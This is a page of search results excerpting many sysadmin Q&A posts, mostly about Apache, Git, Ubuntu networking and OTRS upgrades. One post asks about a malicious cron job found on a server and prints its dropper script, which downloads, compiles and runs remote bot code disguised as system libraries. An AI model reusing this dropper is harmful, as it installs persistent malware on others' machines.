Search Results

Search found 23811 results on 953 pages for 'javax script'.

Page 818/953 | < Previous Page | 814 815 816 817 818 819 820 821 822 823 824 825  | Next Page >

  • Can't install Git

    - by davemc
    Im following the tutorial below to install git. https://help.github.com/articles/set-up-git However when I get to the end where I need to install the helper into the same directory where Git itself is installed i get the following error: Davids-iMac:~ davidcavanagh$ which git /usr/bin/git Davids-iMac:~ davidcavanagh$ sudo mv git-credential-osxkeychain /usr/bin mv: rename git-credential-osxkeychain to /usr/bin/git-credential-osxkeychain: No such file or directory Davids-iMac:~ davidcavanagh$ Edit: I am now getting the following error when I install git and then run git -version Davids-iMac:~ davidcavanagh$ git -version /usr/bin/git: line 1: syntax error near unexpected token `newline' /usr/bin/git: line 1: `<?xml version="1.0" encoding="UTF-8"?>' I was following this tutorial guide:https://help.github.com/articles/set-up-git I have also tried using home-brew as well and I get the following error when I do this: Davids-iMac:~ davidcavanagh$ ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)" ==> This script will install: /usr/local/bin/brew /usr/local/Library/... /usr/local/share/man/man1/brew.1 Press ENTER to continue or any other key to abort ==> Downloading and Installing Homebrew... Failed during: git init -q Can anyone help? Thanks

    Read the article

  • Apache 2.4 + PHP-FPM + ProxyPassMatch

    - by apfelbox
    I recently installed Apache 2.4 on my local machine, together with PHP 5.4.8 using PHP-FPM. Everything went quite smoothly (after a while...) but there is still a strange error: I configured Apache for PHP-FPM like this: <VirtualHost *:80> ServerName localhost DocumentRoot "/Users/apfelbox/WebServer" ProxyPassMatch ^/(.*\.php(/.*)?)$ fcgi://127.0.0.1:9000/Users/apfelbox/WebServer/$1 </VirtualHost> It works, for example if I call http://localhost/info.php I get the correct phpinfo() (it is just a test file). If I call a directory however, I get a 404 with body File not found. and in the error log: [Tue Nov 20 21:27:25.191625 2012] [proxy_fcgi:error] [pid 28997] [client ::1:57204] AH01071: Got error 'Primary script unknown\n' Update I now tried doing the proxying with mod_rewrite: <VirtualHost *:80> ServerName localhost DocumentRoot "/Users/apfelbox/WebServer" RewriteEngine on RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^/(.*\.php(/.*)?)$ fcgi://127.0.0.1:9000/Users/apfelbox/WebServer/$1 [L,P] </VirtualHost> But the problem is: it is always redirecting, because on http://localhost/ automatically http://localhost/index.php is requested, because of DirectoryIndex index.php index.html Update 2 Ok, so I think "maybe check whether there is a file to give to the proxy first: <VirtualHost *:80> ServerName localhost DocumentRoot "/Users/apfelbox/WebServer" RewriteEngine on RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_FILENAME} -f RewriteRule ^/(.*\.php(/.*)?)$ fcgi://127.0.0.1:9000/Users/apfelbox/WebServer/$1 [L,P] </VirtualHost> Now the complete rewriting does not work anymore... Update 3 Now I have this solution: ServerName localhost DocumentRoot "/Users/apfelbox/WebServer" RewriteEngine on RewriteCond /Users/apfelbox/WebServer/%{REQUEST_FILENAME} -f RewriteRule ^/(.*\.php(/.*)?)$ fcgi://127.0.0.1:9000/Users/apfelbox/WebServer/$1 [L,P] First check, that there is a file to pass to PHP-FPM (with the full and absolute path) and then do the rewriting. This does not work when using URL rewriting inside a subdirectory, also it fails for URLs like http://localhost/index.php/test/ So back to square one. Any ideas?

    Read the article

  • Networking stopped working on Ubuntu

    - by 1337Rooster
    I installed Ubuntu 10.04 through the Wubi installer (Funny, I installed it today and thought I would have gotten 10.10). I had a network connection and everything was working fine. I rebooted my coumputer a couple of times and then suddenly, I could not connect to the network and when I click the wireless/networking icon it says "Networking Disabled". I reinstalled Ubuntu and the problem went away. After a few reboots the problem returned. I have tried restarting to see if it would come back as well as a few other things listed below. Any other suggestions would be appreciated. Tried to restart networking via /etc/init.d/networking: amato@ubuntu:~$ sudo /etc/init.d/networking restart * Reconfiguring network interfaces... Ignoring unknown interface eth0=eth0. [ OK ] Tried to stop and start it: amato@ubuntu:~$ sudo /etc/init.d/networking stop * Deconfiguring network interfaces... [ OK ] amato@ubuntu:~$ amato@ubuntu:~$ sudo /etc/init.d/networking start Rather than invoking init scripts through /etc/init.d, use the service(8) utility, e.g. service networking start Since the script you are attempting to invoke has been converted to an Upstart job, you may also use the start(8) utility, e.g. start networking networking stop/waiting Tried start networking: amato@ubuntu:~$ start networking start: Rejected send message, 1 matched rules; type="method_call", sender=":1.58" (uid=1000 pid=2241 comm="start) interface="com.ubuntu.Upstart0_6.Job" member="Start" error name="(unset)" requested_reply=0 destination="com.ubuntu.Upstart" (uid=0 pid=1 comm="/sbin/init")) amato@ubuntu:~$ sudo start networking networking stop/waiting Tried service networking restart: amato@ubuntu:~$ service networking restart restart: Rejected send message, 1 matched rules; type="method_call", sender=":1.60" (uid=1000 pid=2248 comm="restart) interface="com.ubuntu.Upstart0_6.Job" member="Restart" error name="(unset)" requested_reply=0 destination="com.ubuntu.Upstart" (uid=0 pid=1 comm="/sbin/init")) amato@ubuntu:~$ sudo service networking restart restart: Unknown instance: Here are the contents of my /etc/network/interfaces. auto lo iface lo inet loopback I even tried to modify it to this (based on something I read, online, not sure if I was doing the right thing here). Tried everything again and no luck: auto lo eth0 iface lo inet loopback iface eth0 inet dhcp

    Read the article

  • Watchguard Firewall WebBlocker Regular Expression for Multiple Domains?

    - by Eric
    I'm pretty sure this is really a regex question, so you can skip to REGEX QUESTION if you want to skip the background. Our primary firewall is a Watchguard X750e running Fireware XTM v11.2. We're using webblocker to block most of the categories, and I'm allowing needed sites as they arise. Some sites are simple to add as exceptions, like Pandora radio. That one is just a pattern matched exception with "padnora.com/" as the pattern. All traffic from anywhere on pandora.com is allowed. I'm running into trouble on more sophisticated domains that reference content off of their base domains. We'll take GrooveShark as a sample. If you go to http://grooveshark.com/ and view page source, you'll see hrefs referring to gs-cdn.net as well as grooveshar.com. So adding a WebBlocker exception to grooveshark.com/ is not effective, and I have to add a second rule allowing gs-cdn.net/ as well. I see that the WebBlocker allows regex rules, so what I'd like to do in situations like this is create a single regex rule that allows traffic to all the needed domains. REGEX QUESTION: I'd like to try a regex that matches grooveshark.com/ and gs-cdn.net/. If anybody can help me write that regex, I'd appreciate it. Here is what is in the WatchGuard documentation from that section: Regular expression Regular expression matches use a Perl-compatible regular expression to make a match. For example, .[onc][eor][gtm] matches .org, .net, .com, or any other three-letter combination of one letter from each bracket, in order. Be sure to drop the leading “http://” Supports wild cards used in shell script. For example, the expression “(www)?.watchguard.[com|org|net]” will match URL paths including www.watchguard.com, www.watchguard.net, and www.watchguard.org. Thanks all!

    Read the article

  • Mounting an Azure blob container in a Linux VM Role

    - by djechelon
    I previously asked a question about this topic but now I prefer to rewrite it from scratch because I was very confused back then. I currently have a Linux XS VM Role in Azure. I basically want to create a self-managed and evoluted hosting service using VMs rather than Azure's more-expensive Web Roles. I also want to take advantage of load balancing (between VM Roles) and geo-replication (of Storage Roles), making sure that the "web files" of customers are located in a defined and manageable place. One way I found to "mount" a drive in Linux VM is described here and involves mounting a VHD onto the virtual machine. From what I could learn, the VHD is reliably-stored in a storage role, and is exclusively locked by the VM that uses it. Once the VM Role has its drive I can format the partition to any size I want. I don't want that!! I would like each hosted site to have its own blob directory, then each replicated/load-balanced VM Role to rw mount like in NFS that blob directory to read HTML and script files. The database is obviously courtesy of Microsoft :) My question is Is it possible to actually mount a blob storage into a directory in the Linux FS? Is it possible in Windows Server 2008?

    Read the article

  • Pain removing a perl rootkit

    - by paul.ago
    So, we host a geoservice webserver thing at the office. Someone apparently broke into this box (probably via ftp or ssh), and put some kind of irc-managed rootkit thing. Now I'm trying to clean the whole thing up, I found the process pid who tries to connect via irc, but i can't figure out who's the invoking process (already looked with ps, pstree, lsof) The process is a perl script owned by www user, but ps aux |grep displays a fake file path on the last column. Is there another way to trace that pid and catch the invoker? Forgot to mention: the kernel is 2.6.23, which is exploitable to become root, but I can't touch this machine too much, so I can't upgrade the kernel EDIT: lsof might help: lsof -p 9481 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAMEss perl 9481 www cwd DIR 8,2 608 2 /ss perl 9481 www rtd DIR 8,2 608 2 /ss perl 9481 www txt REG 8,2 1168928 38385 /usr/bin/perl5.8.8ss perl 9481 www mem REG 8,2 135348 23286 /lib64/ld-2.5.soss perl 9481 www mem REG 8,2 103711 23295 /lib64/libnsl-2.5.soss perl 9481 www mem REG 8,2 19112 23292 /lib64/libdl-2.5.soss perl 9481 www mem REG 8,2 586243 23293 /lib64/libm-2.5.soss perl 9481 www mem REG 8,2 27041 23291 /lib64/libcrypt-2.5.soss perl 9481 www mem REG 8,2 14262 23307 /lib64/libutil-2.5.soss perl 9481 www mem REG 8,2 128642 23303 /lib64/libpthread-2.5.soss perl 9481 www mem REG 8,2 1602809 23289 /lib64/libc-2.5.soss perl 9481 www mem REG 8,2 19256 38662 /usr/lib64/perl5/5.8.8/x86_64-linux-threa d-multi/auto/IO/IO.soss perl 9481 www mem REG 8,2 21328 38877 /usr/lib64/perl5/5.8.8/x86_64-linux-threa d-multi/auto/Socket/Socket.soss perl 9481 www mem REG 8,2 52512 23298 /lib64/libnss_files-2.5.soss perl 9481 www 0r FIFO 0,5 1068892 pipess perl 9481 www 1w FIFO 0,5 1071920 pipess perl 9481 www 2w FIFO 0,5 1068894 pipess perl 9481 www 3u IPv4 130646198 TCP 192.168.90.7:60321-www.**.net:ircd (SYN_SENT)

    Read the article

  • CA SiteMinder Configuration for Ubuntu

    - by Matt Franklin
    I receive the following error when attempting to start apache through the init.d script: *apache2: Syntax error on line 186 of /etc/apache2/apache2.conf: Syntax error on line 4 of /etc/apache2/mods-enabled/auth_sm.conf: Cannot load /apps/netegrity/webagent/bin/libmod_sm22.so into server: libsmerrlog.so: cannot open shared object file: No such file or directory* SiteMinder does not officially support Ubuntu, so I am having trouble finding any configuration documentation to help me troubleshoot this issue. I successfully installed the SiteMinder binaries and registered the trusted host with the server, but I am having trouble getting the apache mod to load correctly. I have added the following lines to a new auth_sm.conf file in /etc/apache2/mods-available and symlinked to it in /etc/apache2/mods-enabled: SetEnv LD_LIBRARY_PATH /apps/netegrity/webagent/bin SetEnv PATH ${PATH}:${LD_LIBRARY_PATH} LoadModule sm_module /apps/netegrity/webagent/bin/libmod_sm22.so SmInitFile "/etc/apache2/WebAgent.conf" Alias /siteminderagent/pwcgi/ "/apps/netegrity/webagent/pw/" <Directory "/apps/netegrity/webagent/pw/"> Options Indexes MultiViews ExecCGI AllowOverride None Order allow,deny Allow from all </Directory> UPDATE: Output of ldd libmod_sm22.so: ldd /apps/netegrity/webagent/bin/libmod_sm22.so linux-gate.so.1 = (0xb8075000) libsmerrlog.so = /apps/netegrity/webagent/bin/libsmerrlog.so (0xb7ec0000) libsmeventlog.so = /apps/netegrity/webagent/bin/libsmeventlog.so (0xb7ebb000) libpthread.so.0 = /lib/tls/i686/cmov/libpthread.so.0 (0xb7e9a000) libdl.so.2 = /lib/tls/i686/cmov/libdl.so.2 (0xb7e96000) librt.so.1 = /lib/tls/i686/cmov/librt.so.1 (0xb7e8d000) libstdc++.so.5 = /usr/lib/libstdc++.so.5 (0xb7dd3000) libm.so.6 = /lib/tls/i686/cmov/libm.so.6 (0xb7dad000) libgcc_s.so.1 = /lib/libgcc_s.so.1 (0xb7d9e000) libc.so.6 = /lib/tls/i686/cmov/libc.so.6 (0xb7c3a000) libsmcommonutil.so = /apps/netegrity/webagent/bin/libsmcommonutil.so (0xb7c37000) /lib/ld-linux.so.2 (0xb8076000) UPDATE: The easiest way to set environment variables for the Apache run user in Ubuntu is to edit the /etc/apache2/envvars file and add export statements for any library paths you may need

    Read the article

  • Fetching e-mails into Redmine via IMAP

    - by Danilo Bargen
    I'm trying to fetch e-mails into Redmine via IMAP. The e-mails I'm generating look like this: FooBar Ltd 123456 http://example.com/Foobar-Ltd-123456.html Project: backend Tracker: Dataerror Beschreibung: This is the description =========================== CLIENT_IP: 192.168.1.215 HTTP_USER_AGENT: mozilla/asdfjköl I try to fetch them into Redmine via this command: rake -f /var/www/projects/redmine/Rakefile redmine:email:receive_imap \ RAILS_ENV="production" host=example.com port=993 ssl=true username=redmine \ password=1234 project=myproject tracker=other \ allow_override=project,tracker,category,priority \ move_on_success=read move_on_failure=failed But the e-mails get moved into the failed folder. I had this setup running some time ago with a different e-mail generator but pretty much the same template, and I can't figure out why it's not working. The permissions seem to be OK too. In order to further debug this issue, I need some logfiles. Are there any logfiles written by this command? Or are there any other suggestions to solve this issue? My environment: danilo@jabba:/var/www/projects/redmine$ RAILS_ENV=production script/about About your application's environment Ruby version 1.8.7 (i486-linux) RubyGems version 1.3.5 Rack version 1.0 Rails version 2.3.5 Active Record version 2.3.5 Active Resource version 2.3.5 Action Mailer version 2.3.5 Active Support version 2.3.5 Application root /var/www/projects/redmine Environment production Database adapter mysql Database schema version 20100819172912

    Read the article

  • Windows Server Backup - Recover only shows the latest backup

    - by Steffen
    We're having quite some trouble at work using Windows Server Backup. We have a HyperV server (Win 2008) running 8 virtual web servers, these are running a variety of OS'es: Win 2003, Win 2008 and a lone Debian. Each virtual server has a separate partition on the physical HyperV server, so e.g. E: is virtual server #1, F: is #2 and so forth. For backup we use Windows Server Backup, or more exactly we use the commandline tool: wbadmin.exe We need to make the backups without stopping the virtual servers, as we cannot afford the downtime (we've got users online both day and night), and Windows Server Backup offers to use the shadow copy provider to archive this. We run wbadmin like this: wbadmin start backup -backuptarget:\\remotebackuplocation\somefolder -include:E: -quiet We run it once per partition, because we've got a script wrapped around that command, for sending us an email about how it went. Each time we run wbadmin it'll delete the Backup xxxx folder it created in last backup, and just create a new. In order to prevent this from happening, we rename the backup xxx folder after each backup is run, before starting the next one. I realize we must rename it back to its original name prior to recovering, and we obviously do this. Now the issue is as follows: Even though we have all the backed up files, and rename whichever backup we want to use, to its original name, we can only see the latest backup in the Windows Server Backup GUI when we select "Recover". This means we can only recover the last partition we backup up, so e.g. E: can never be recovered. In other words we're screwed :-( My question is: Does anyone know how to use Windows Server Backup for a scenario like this ? Or is it simply not possible due to the simplicity of Windows Server Backup ? If it's not possible, could you recommend some backup software for this purpose ? We've already looked at MS' System Center Data Protection Manager, however it's quite expensive and the boss doesn't like that :-/

    Read the article

  • Is SecureShellz bot a virus? How does it work?

    - by ProGNOMmers
    I'm using a development server in which I found this in the crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd [...] http://stablehost.us/bots/regular.bot contents are: #!/bin/sh if [ $(whoami) = "root" ]; then echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1 wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2 exit 1 fi wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_ I cannot contact the sysadmin for various reasons, so I cannot ask infos about this to him. It seems to me this script downloads some remote C source codes and binaries, compile them and execute them. I am a web developer, so I am not an expert about C language, but watching at the downloaded files it seems to me a bot injected in the cron of the server. Can you give me more infos about what this code does? About its working, its purposes?

    Read the article

  • routing table permissions under Windows 7 and openvpn

    - by pilcrow
    My ovpn client, 32-bit OpenVPN 2.1.1 on 64-bit Windows 7 Pro, cannot accept routes pushed to it by my remote endpoint ovpn server. This happens even if I invoke OpenVPN as a member of Administrators, and whether or not I've specified script-security 2 (as suggested by [this question][2]). Mon Mar 29 12:57:19 2010 Notified TAP-Win32 driver to set a DHCP IP/netmask of 192.168.254.3/255.255.255.0 on interface {8BE2E9CF-F4C9-4A5E-98FD-E12DF1B6C3A4} [DHCP-serv: 192.168.254.3, lease-time: 86400] Mon Mar 29 12:57:19 2010 NOTE: FlushIpNetTable failed on interface [14] {GUID} (status=5) : Access is denied. Mon Mar 29 12:57:24 2010 TEST ROUTES: 8/8 succeeded len=8 ret=1 a=0 u/d=up Mon Mar 29 12:57:24 2010 C:\WINDOWS\system32\route.exe ADD 172.20.1.0 MASK 255.255.255.0 192.168.254.1 Mon Mar 29 12:57:24 2010 ROUTE: route addition failed using CreateIpForwardEntry: Access is denied. [status=5 if_index=14] Mon Mar 29 12:57:24 2010 Route addition via IPAPI failed [adaptive] Mon Mar 29 12:57:24 2010 Route addition fallback to route.exe Mon Mar 29 12:57:24 2010 ERROR: Windows route add command failed [adaptive]: returned error code 1 ... and so on for each specific route the server pushes out. It doesn't seem right to me that the administrative user, the one configured at Windows 7 install time, should need further privileges. What am I missing?

    Read the article

  • IIS 7.5 How to disable "Verify File Exists" for siteminder handler

    - by HariM
    We are trying to use ASP.Net MVC with Siteminder for Single Sign on. This is on Windows Server 2008 R2 with IIS 7.5. Siteminder Agent version 6QMR6. Problem : Siteminder protects physical files that are exist. And it is not protecting the folder when we try to access a non existed file. It must redirect to login page even if the file doesn't exist when the user is accessing a protected folder. How to configure in IIS 7.5 that Do not verify a file exist, before authentication by siteminder. SiteMinderWebAgent is a Handler(WildCard Script Map) we created using the ISAPI6WebAgent.dll How to Protect ASP.Net MVC Request with Siteminder? (Added this as My previous question did not solve the problem). MVC Request shows up in IIS Log but not in Siteminder log. Update : Microsoft Support says currently IIS7.5, even in earlier versions doesnt support wildcard mappings on any two Isapi Handlers with * wild card. Currently in my case Siteminder has * wildcard and asp.net mvc (handler is aspnet_isapi) has * wildcard to handle the reqeusts. Ordered priority doesnt work in the wild card mappings case with Just *. Did not convinced with the answer but will wait till tomorrow for them to get back.

    Read the article

  • therubyracer on Ubuntu install issues with ruby-2.0.0-p247

    - by Victor S
    I can't seem to get therubyracer gem installed on ubuntu, i get the following errors, anyone can help? ERROR: Error installing therubyracer: ERROR: Failed to build gem native extension. /home/victorstan/.rvm/rubies/ruby-2.0.0-p247/bin/ruby extconf.rb checking for main() in -lpthread... yes creating Makefile make compiling constraints.cc compiling array.cc compiling value.cc compiling invocation.cc compiling primitive.cc compiling trycatch.cc compiling context.cc compiling exception.cc compiling template.cc compiling accessor.cc compiling object.cc compiling script.cc compiling external.cc compiling stack.cc compiling gc.cc compiling backref.cc compiling heap.cc compiling v8.cc compiling constants.cc compiling date.cc compiling function.cc compiling rr.cc compiling message.cc compiling init.cc compiling string.cc compiling handles.cc compiling signature.cc compiling locker.cc linking shared-object v8/init.so g++: /home/victorstan/.rvm/gems/ruby-2.0.0-p247@global/gems/libv8-3.11.8.17-x86_64-linux/vendor/v8/out/ia32.release/obj.target/tools/gyp/libv8_base.a: No such file or directory g++: /home/victorstan/.rvm/gems/ruby-2.0.0-p247@global/gems/libv8-3.11.8.17-x86_64-linux/vendor/v8/out/ia32.release/obj.target/tools/gyp/libv8_snapshot.a: No such file or directory make: *** [init.so] Error 1 Update It seems it's trying to use a 32 bit library instead of a 64 bit library, anyone else experience issue trying to install 64 bit applications and packages on Ubuntu, and it trying to install 32 bit version instead (even though the system is a 64 Linux)? Related: https://github.com/cowboyd/therubyracer/issues/262

    Read the article

  • Django running on Apache+WSGI and apache SSL proxying

    - by Lessfoe
    Hi all, I'm trying to rewrite all requests for my Django server running on apache+WSGI ( inside my local network) and configured as the WSGI's wiki how to, except that I set a virtualhost for it. The server which from I want to rewrite requests is another apache server listening on port 80. I can manage it to work well if I don't try to enable SSL connection as the required way to connect. But I need all requests to Django server encrypted with SSL so I generally used this directive to achieve this ( on my public webserver ): Alias /dirname "/var/www/dirname" SSLVerifyClient none SSLOptions +FakeBasicAuth SSLRequireSSL AuthName "stuff name" AuthType Basic AuthUserFile /etc/httpd/djangoserver.passwd require valid-user # redirect all request to django.test:80 RewriteEngine On RewriteRule (.*)$ http://django.test/$1 [P] This configuration works if I try to load a specific page trough the external server from my browser. It is not working clicking my django application urls ( even tough the url seems correct when I put my mouse over). The url my public server is trying to serve use http ( instead of https ) and the directory "dirname" I specified on my apache configuration disappear, so it says that the page was not found. I think it depends on Django and its WSGI handler . Does anybody went trough my same problem? PS: I have already tried to modify the WSGI script . I'm Using Django 1.0.3, Apache 2.2 on a Fedora10 (inside), Apache 2.2 on the public server. Thanks in advance for your help. Fab

    Read the article

  • How to disable windows server 2008 timestamp response

    - by Cal
    Posted this question on stackoverflow but then got instructed to post it here: I was using Rapid7's Nexpose to scan one of our web servers (windows server 2008), and got a vulnerability for timestamp response. According to Rapid7, timestamp response shall be disabled: http://www.rapid7.com/db/vulnerabilities/generic-tcp-timestamp So far I have tried several things: Edit the registry, add a "Tcp1323Opts" key to HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, and set it to 0. http://technet.microsoft.com/en-us/library/cc938205.aspx Use this command: netsh int tcp set global timestamps=disabled Tried powershell command: Set-netTCPsetting -SettingName InternetCustom -Timestamps disabled (got error: Set-netTCPsetting : The term 'Set-netTCPsetting' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.) None of above attempts was successful, after re-scan we still got the same alert. Rapid7 suggested using a firewall that's capable of blocking it, but we want to know if there is a setting on windows to achieve it. Is it through a specific port? If yes, what is the port number? If not, could you suggest a 3rd party firewall that is capable of blocking it? Thank you very much.

    Read the article

  • Trying to run chrooted suPHP with UserDir, getting 500 server error

    - by Greg Antowski
    I've managed to get suPHP working fine with UserDir (i.e. PHP files run from the /home/$username/public_html) directory, but I can't get it to work when I chroot it to the user's home directory. I've been following this guide: http://compilefailure.blogspot.co.nz/2011/09/suphp-chroot-gotchas.html And adapting it to my needs. I'm not creating vhosts, I just want PHP scripts to be jailed to the user's home directory. I've gotten to the part where you use makejail and set up a symlink. However even with the symlink set up correctly, PHP scripts won't run. This is what's shown in the Apache error log: SoftException in Application.cpp:537: Could not execute script "/home/jimmy/public_html/test.php" [error] [client 127.0.0.1] Caused by SystemException in API_Linux.cpp:444: execve() for program "/usr/bin/php-cgi" failed: No such file or directory The thing is, if I try running either of the following commands in the terminal it works without any issues: /home/jimmy/usr/bin/php-cgi /home/jimmy/public_html/test.php /usr/bin/php-cgi /home/jimmy/public_html/test.php I've been trying for hours to get this going and documentation for this kind of stuff is almost non-existent. If anyone could help me out with this, I'd be extremely grateful.

    Read the article

  • Installing ikiwiki on nginx - fastcgi/fcgi wrapper

    - by meder
    My ultimate goal is to setup ikiwiki, my current goal is to get a fcgi wrapper working for nginx, so I can move on to the next step... The ikiwiki page points out this page as an example for a fcgi wrapper: http://technotes.1000lines.net/?p=23 So far I've installed the ikiwiki and libfcgi-perl modules through aptitude: aptitude install libfcgi-perl aptitude install ikiwiki It installed those packages as well as some minimal dependency packages. So the next step following the guide at technotes, I grabbed http://technotes.1000lines.net/fastcgi-wrapper.pl but I'm not sure where to actually place this file... do I run it as a service? The script makes a socket file in /var/run/nginx but that directory does not exist.. do I manually create it? So in addition to the .pl file for the cgi wrapper, I need to also define a separate cgi file for parameters. If my conf looks like this... server { listen 80; server_name notes.domain.org; access_log /www/notes/public_html/notes.domain.org/log/access.log; error_log /www/notes/public_html/notes.domain.org/log/error.log; location / { root /www/notes/public_html/notes.domain.org/public/; index index.html; } } And I don't have a cgi-bin directory, where exactly should I create it within my structure, and regarding that I'd obviously have to update the below before I include it in my conf, but I'm just not exactly sure how this would work out. # /cgi-bin configuration location ~ ^/cgi-bin/.*\.cgi$ { gzip off; fastcgi_pass unix:/var/run/nginx/perl_cgi-dispatch.sock; [1]* fastcgi_param SCRIPT_FILENAME /www/blah.com$fastcgi_script_name; [2]* include fastcgi_params; [3]* } Also since the user is www-data and /var/run is root owned, what's the proper way of giving it access? Any tips appreciated.

    Read the article

  • smtp.gmail.com from bash gives "Error in certificate: Peer's certificate issuer is not recognized."

    - by ndasusers
    I needed my script to email admin if there is a problem, and the company only uses Gmail. Following a few posts instructions I was able to set up mailx using a .mailrc file. there was first the error of nss-config-dir I solved that by copying some .db files from a firefox directory. to ./certs and aiming to it in mailrc. A mail was sent. However, the error above came up. By some miracle, there was a Google certificate in the .db. It showed up with this command: ~]$ certutil -L -d certs Certificate Nickname Trust Attributes SSL,S/MIME,JAR/XPI GeoTrust SSL CA ,, VeriSign Class 3 Secure Server CA - G3 ,, Microsoft Internet Authority ,, VeriSign Class 3 Extended Validation SSL CA ,, Akamai Subordinate CA 3 ,, MSIT Machine Auth CA 2 ,, Google Internet Authority ,, Most likely, it can be ignored, because the mail worked anyway. Finally, after pulling some hair and many googles, I found out how to rid myself of the annoyance. First, export the existing certificate to a ASSCII file: ~]$ certutil -L -n 'Google Internet Authority' -d certs -a > google.cert.asc Now re-import that file, and mark it as a trusted for SSL certificates, ala: ~]$ certutil -A -t "C,," -n 'Google Internet Authority' -d certs -i google.cert.asc After this, listing shows it trusted: ~]$ certutil -L -d certs Certificate Nickname Trust Attributes SSL,S/MIME,JAR/XPI ... Google Internet Authority C,, And mailx sends out with no hitch. ~]$ /bin/mailx -A gmail -s "Whadda ya no" [email protected] ho ho ho EOT ~]$ I hope it is helpful to someone looking to be done with the error. Also, I am curious about somethings. How could I get this certificate, if it were not in the mozilla database by chance? Is there for instance, something like this? ~]$ certutil -A -t "C,," \ -n 'gmail.com' \ -d certs \ -i 'http://google.com/cert/this...'

    Read the article

  • Executing Oracle SQLPlus in a Powershell Invoke-Command statement against a remote machine

    - by Scott Muc
    We have a basic powershell script that attempts to execute SQLPlus.exe on a remote machine. The remote does not have Oracle Instant client installed, but we have bundled all the necesary dlls in a remote folder. For example we have sqlplus.exe and dependencies in the directory C:\temp\oracle. If I navigate to that path on the remote server and execute sqlplus.exe it runs just fine. I get the prompt for username. If I go: Invoke-Command -comp remote.machine.host -ScriptBlock { C:\temp\oracle\sqplus.exe } I get the following: Error 57 initializing SQL*Plus + CategoryInfo : NotSpecified: (Error 57 initializing SQL*Plus:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError Error loading message shared library Thinking that it's potentially a PATH issue I tried the following: Invoke-Command -comp remote.machine.host -ScriptBlock { $env:ORACLE_HOME= "C:\temp\oracle"; $env:PATH = "$env:ORACLE_HOME; C:\temp\oracle\sqlplus.exe } This had the same result. The error code is not very helpful and is extremely frustrating since it does work when I log on to the machine. What is powershell remoting doing that's making this not work?

    Read the article

  • can't get php mail() working on Ubuntu desktop version with sendmail and postfix

    - by EricP
    I'm running Ubuntu 9.10 LAMP and trying to do a simple email test with PHP and I'm not getting any emails sent. mail("[email protected]", "eric-linux test", "test") or die("can't send mail"); I get no errors from PHP when running that script. In my php.ini file is: sendmail_path = /usr/lib/sendmail -t -i $ sudo ps aux | grep sendmail eric 2486 0.0 0.4 8368 2344 pts/0 T 14:52 0:00 sendmail -s “Hello world” [email protected] eric 8747 0.0 0.3 5692 1616 pts/2 T 16:18 0:00 sendmail eric 8749 0.0 0.3 5692 1636 pts/2 T 16:18 0:00 sendmail start eric 9190 0.0 0.3 5692 1636 pts/2 T 19:12 0:00 sendmail start eric 9192 0.0 0.3 5692 1616 pts/2 T 19:12 0:00 sendmail eric 9425 0.0 0.3 5692 1620 pts/1 T 19:37 0:00 sendmail eric 9427 0.0 0.3 6584 1636 pts/1 T 19:37 0:00 sendmail restart eric 9429 0.0 0.3 5692 1636 pts/1 T 19:38 0:00 /usr/lib/sendmail restart eric 9432 0.0 0.1 3040 804 pts/1 R+ 19:38 0:00 grep --color=auto sendmail When I run $ sendmail start it just hangs there doing nothing. I installed postfix also to see if it would help, but it didn't. I tried to see port 25: eric@eric-linux:~$ telnet localhost 25 Trying ::1... Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 eric-linux ESMTP Postfix (Ubuntu) thanks

    Read the article

  • OTRS upgrade 3.0 to 3.1 fails

    - by Valentin0S
    Today I've started upgrading OTRS from version 2.3 to 2.4 , 2.4 to 3.0 and 3.0 to 3.1. Everything went smoothly except the upgrade from 3.0 to 3.1 OTRS provides a few perl scripts which make the upgrade easier. I've used these scripts for each upgrade step. The upgrade from 3.0 to 3.1 fails at the following after using the upgrade script. scripts/DBUpdate-to-3.1.pl The error is : root@tickets:/opt/otrs# su - otrs $ scripts/DBUpdate-to-3.1.pl Migration started... Step 1 of 24: Refresh configuration cache... If you see warnings about 'Subroutine Load redefined', that's fine, no need to worry! Subroutine Load redefined at /opt/otrs/Kernel/Config/Files/ZZZAAuto.pm line 5. Subroutine Load redefined at /opt/otrs/Kernel/Config/Files/ZZZAuto.pm line 4. done. Step 2 of 24: Check framework version... done. Step 3 of 24: Creating DynamicField tables (if necessary)... done. DBD::mysql::db do failed: Cannot add or update a child row: a foreign key constraint fails (`pp_otrs`.`dynamic_field`, CONSTRAINT `FK_dynamic_field_create_by_id` FOREIGN KEY (`create_by`) REFERENCES `users` (`id`)) at /opt/otrs-3.1.10/Kernel/System/DB.pm line 478. ERROR: OTRS-DBUpdate-to-3.1-10 Perl: 5.14.2 OS: linux Time: Wed Sep 5 15:36:20 2012 Message: Cannot add or update a child row: a foreign key constraint fails (`pp_otrs`.`dynamic_field`, CONSTRAINT `FK_dynamic_field_create_by_id` FOREIGN KEY (`create_by`) REFERENCES `users` (`id`)), SQL: 'INSERT INTO dynamic_field (name, label, field_order, field_type, object_type, config, valid_id, create_time, create_by, change_time, change_by) VALUES 